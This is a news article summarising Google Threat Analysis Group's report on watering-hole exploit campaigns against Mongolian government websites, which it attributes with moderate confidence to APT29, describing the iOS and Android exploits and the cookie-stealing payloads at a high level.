Google LLC’s Threat Analysis Group today shared details on multiple observed in-the-wild exploit campaigns that used watering-hole attacks on Mongolian government websites between November 2023 and July this year.
A watering-hole attack is a strategy that involves attackers compromising legitimate websites that their target or targets frequently visit by embedding malicious code to exploit vulnerabilities in the target’s devices. The goal is to infect visitors with malware or steal sensitive information when they access the compromised site.
In the case of the campaign targeting Mongolian government websites, those behind the attack targeted mobile users on both Apple Inc. and Android devices. Those behind the campaign at first delivered an iOS WebKit exploit affecting iOS versions older than 16.6.1 and then, later, a Chrome exploit chain against Android users running versions from m121 to m123.
The campaigns delivered n-day exploits for which patches were available but would still be effective against unpatched devices.
The iOS exploit was delivered by the attackers by exploiting the websites to serve an iframe that delivered malicious code to exploit unpatched Apple phones. The payload included a cookie stealer framework that had previously been seen in 2021 targeting European officials and also included a reconnaissance payload to identify vulnerable devices before deploying the exploit.
The campaign targeting Android, which also involved the compromise of Mongolian government websites, used obfuscated JavaScript to inject the malicious iframe, leveraging a previously known NSO Group exploit method. The final payload collected sensitive user data, including cookies, account information and browsing history.
Both campaigns are said to have reused or closely mirrored previously observed exploits from commercial surveillance vendors like Intellexa and NSO Group Ltd. However, there were some notable differences between the attackers’ methods and objectives, such as cookie theft and data exfiltration, that are more aligned with state-sponsored activities. “We assess with moderate confidence the campaigns are linked to the Russian government-backed actor APT29,” the Google researchers wrote.
APT29, also known as Cozy Bear, has previously been linked to or credited with attacks on TeamViewer SE in June and an attack on the U.S. Treasury and Commerce Departments in December 2020.
“Watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices,” Google’s researchers conclude. “Watering holes can still be an effective avenue for n-day exploits by mass targeting a population that might still run unpatched browsers.”